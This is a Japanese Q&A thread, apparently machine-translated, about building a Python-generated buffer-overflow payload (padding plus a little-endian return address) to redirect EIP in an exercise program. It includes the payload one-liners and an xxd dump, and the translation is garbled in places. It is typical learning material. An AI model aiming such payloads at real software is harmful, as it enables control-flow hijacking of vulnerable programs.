バッファオーバーフローのためにPythonでペイロードを生成するには？

Question

私はCコードで関数を実行するためにバッファオーバーフローを引き起こそうとしています。これまでのところ、私はすでにEBPレジスタを引き継ぐバイト数を調べることができました。次に唯一のことは、実行したい機能にEIPのアドレスを代入することです。私はこのペイロードをPythonで生成しようとしています。このために、私は以下の

python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload 

を使用これは私が

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;� 

お知らせそれらの最後の文字が得るものです！私はそれが私が得ると思われるものではないことを知っています。 EIPの登録簿で実行したいアドレスは0804863bです。悪用を正しく実行するには、これをlittle endianに入れなければなりませんでした。これに関するコメント？これのために悪用をさらに進めることはできません...

Answer 1

あなたのattack_payloadファイルをどのように見てもわかりません。しかし、ターミナルにそれをダンプしたり、エディタ内で見ることはできません。この場合、データは文字として解釈されるためです。代わりに、XXDで、たとえば、ファイルの一部hexdumpに対して操作を行う必要があります：あなたが最後の行で見ることができるようにあなたがこれらを期待どこ

$ python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload 
$ xxd attack_payload 
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 
... 
00000060: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 
00000070: 3b86 0408 0a        ;.... 

、バイト\x3b\x86\x04\x08はほとんどが実際にあります。ファイルの末尾に改行文字\x0a（つまり\n）があるとは思わなかったでしょうが、それはPythonのprintが追加するものです。あなたは `> attack_payload`を削除した場合EIPが正常に要求されたアドレスに

$ python -c 'import sys; sys.stdout.write("A"*112 + "\x3b\x86\x04\x08")' > attack_payload